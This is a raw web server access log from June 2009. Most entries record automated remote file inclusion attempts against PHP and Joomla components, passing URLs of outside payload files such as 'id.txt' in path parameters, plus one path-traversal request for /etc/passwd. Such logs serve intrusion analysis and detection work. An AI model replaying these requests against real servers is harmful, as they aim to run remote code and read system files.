199.120.90.222 - - [04/Jun/2009:02:46:58 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:46:58 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:47:01 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:02:47:18 -0400] "GET /logs/access_log.Q109051000/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.6.8.112 - - [04/Jun/2009:02:47:39 -0400] "GET /logs/error_log.Q107120400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
199.120.90.222 - - [04/Jun/2009:02:48:09 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:48:11 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.149.157.130 - - [04/Jun/2009:02:48:14 -0400] "GET /logs/error_log.Q108070300//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.149.157.130 - - [04/Jun/2009:02:48:21 -0400] "GET /logs/error_log.Q108070300//ashnews.php?pathtoashnews=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
195.34.78.110 - - [04/Jun/2009:02:48:22 -0400] "GET /logs/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:48:22 -0400] "GET /?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:48:29 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:48:30 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:48:37 -0400] "GET /?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:48:37 -0400] "GET /logs/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:48:38 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:48:40 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:48:44 -0400] "GET //components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:48:44 -0400] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:48:44 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:47 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:47 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:47 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:47 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:47 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:47 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:53 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:48:53 -0400] "GET /logs/access_log.Q108121900//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:49:03 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:49:03 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:49:26 -0400] "GET /logs/access_log.Q109050900/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:49:28 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:49:28 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:49:44 -0400] "GET /logs/access_log.Q109050700%20%20//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:49:50 -0400] "GET /logs/access_log.Q109051000/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:02:50:31 -0400] "GET /logs/access_log.Q108121900%20%20//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:50:31 -0400] "GET /logs/access_log.Q109052500//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:50:32 -0400] "GET //[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
203.251.225.77 - - [04/Jun/2009:02:50:32 -0400] "GET /logs/access_log.Q109052500//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
203.251.225.77 - - [04/Jun/2009:02:50:32 -0400] "GET /logs//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
203.251.225.77 - - [04/Jun/2009:02:50:32 -0400] "GET //[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
123.143.98.5 - - [04/Jun/2009:02:50:33 -0400] "GET /logs//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
123.143.98.5 - - [04/Jun/2009:02:50:33 -0400] "GET /logs/error_log.Q109051400//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
89.188.129.126 - - [04/Jun/2009:02:50:39 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:02:50:44 -0400] "GET /logs/error_log.Q109051400//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
203.251.225.77 - - [04/Jun/2009:02:50:54 -0400] "GET /logs/access_log.Q109052500//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
203.251.225.77 - - [04/Jun/2009:02:50:54 -0400] "GET //[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
203.251.225.77 - - [04/Jun/2009:02:50:57 -0400] "GET /logs//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
203.251.225.77 - - [04/Jun/2009:02:51:08 -0400] "GET /logs/error_log.Q109051400//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.79"
209.59.12.99 - - [04/Jun/2009:02:51:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.251.225.77 - - [04/Jun/2009:02:51:38 -0400] "GET /logs/error_log.Q109051400%20//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
110.45.144.106 - - [04/Jun/2009:02:51:40 -0400] "GET /logs//include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
110.45.144.106 - - [04/Jun/2009:02:51:40 -0400] "GET /logs/access_log.Q109051100//include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
110.45.144.106 - - [04/Jun/2009:02:51:40 -0400] "GET //include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [04/Jun/2009:02:51:50 -0400] "GET /logs/error_log.Q109051400%20//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
203.251.225.77 - - [04/Jun/2009:02:51:59 -0400] "GET /logs/error_log.Q109051400%20//[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt??? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
213.198.73.59 - - [04/Jun/2009:02:52:21 -0400] "GET /logs/access_log.Q109052200%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:02:52:27 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:17 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:18 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:18 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:46 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:53 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:53 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.144.106 - - [04/Jun/2009:02:53:54 -0400] "GET /logs/error_log.Q109051100//include/mail.php?skin_board_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:57 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:53:57 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:54:29 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:54:29 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:54:29 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:54:42 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:55:10 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:55:10 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:55:10 -0400] "GET /logs/access_log.Q109050900/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:02:55:31 -0400] "GET /logs/access_log.Q109051000/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:02:56:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.38.54.140 - - [04/Jun/2009:02:56:51 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:56:57 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:02:56:57 -0400] "GET /logs/access_log.Q109050700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:57:11 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:57:32 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:57:40 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:02:57:54 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:58:16 -0400] "GET /logs/access_log.Q109051600%20%20//skin/zero_vote/ask_password.php?dir=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:02:59:24 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:02:59:24 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:02:59:24 -0400] "GET /logs/access_log.Q109050300//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:59:53 -0400] "GET //?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:59:53 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:02:59:53 -0400] "GET /logs//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:00:06 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:03:00:06 -0400] "GET /logs//sitemap.xml.php?dir[classes]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:03:00:06 -0400] "GET //sitemap.xml.php?dir[classes]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:03:00:06 -0400] "GET /logs/access_log.Q108121900%20%20//sitemap.xml.php?dir[classes]=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:00:51 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:00:51 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:00:51 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:03:01:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
199.120.90.222 - - [04/Jun/2009:03:01:14 -0400] "GET //?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:20 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:20 -0400] "GET /logs//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:21 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:35 -0400] "GET /logs/access_log.Q109052200%20%20//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:36 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:42 -0400] "GET //?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:42 -0400] "GET /logs//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 200 4103 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:43 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:01:56 -0400] "GET /logs/access_log.Q109052200//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.92.50 - - [04/Jun/2009:03:02:03 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../etc/passwd HTTP/1.0" 404 247 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [04/Jun/2009:03:02:03 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://elgallitoingles.com/images/products/hk? HTTP/1.0" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
201.232.54.48 - - [04/Jun/2009:03:02:35 -0400] "GET /logs/access_log.Q109050300%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:03:40 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:03:40 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:03:40 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:03:03:42 -0400] "GET /logs/access_log.Q109050300%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.165.73.157 - - [04/Jun/2009:03:03:56 -0400] "GET /logs/access_log.Q109050300//components/com_simpleboard/file_upload.php?sbp=http://cafe0.fileave.com/id.feelcomz.txt%20%20? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:04:11 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:03:04:29 -0400] "GET /logs/access_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.6.8.112 - - [04/Jun/2009:03:04:32 -0400] "GET /logs/access_log.Q107100800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
199.120.90.222 - - [04/Jun/2009:03:04:39 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:04:55 -0400] "GET /logs/access_log.Q109052200%20%20//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:03:04:57 -0400] "GET /logs/access_log.Q109052200%20%20//?_zb_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
